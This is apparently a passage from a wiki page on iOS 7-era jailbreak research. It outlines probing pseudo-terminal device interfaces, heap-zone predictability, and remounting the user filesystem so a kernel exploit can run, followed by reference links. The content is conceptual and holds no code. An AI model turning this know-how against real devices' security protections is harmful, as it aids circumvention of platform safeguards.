Examine the read, write, and select apis for these terminals to learn all you can do. ioctl calls might also be interesting. Also since it uses the tty zone for allocating this devices, it might be a very predictable zone if we can control all the pseudo terminals. Also checking out return values based on flags in structs can be a good way to feel around in memory.
New in iOS 7.0 security protections, you are now no longer allowed to remount the root partition as readable/writeable. Before we just change the /etc/fstab file to remount the filesystems, but now there is a special kernel check preventing root filesystem from being remounted. Also the user filesystem containing all the data is mounted to disallow super user files, and device nodes. Luckily, if we can remount the user filesystem to reallow superuser and device node files we can create this device node and launch the kernel exploit on iOS7.
See Also
References
- ^ https://twitter.com/saurik/status/414743665362231296
- ^ https://twitter.com/superMTW/status/414821856534081536
- ^ https://twitter.com/saurik/status/414810297937838080
- ^ https://twitter.com/chpwn/status/414879769872703488
- ^ https://twitter.com/pod2g/status/414942393830756352
- ^ https://developer.apple.com/library/mac/documentation/DeveloperTools/Conceptual/MachORuntime/Reference/reference.html#//apple_ref/doc/uid/TP40000895-CH248-95693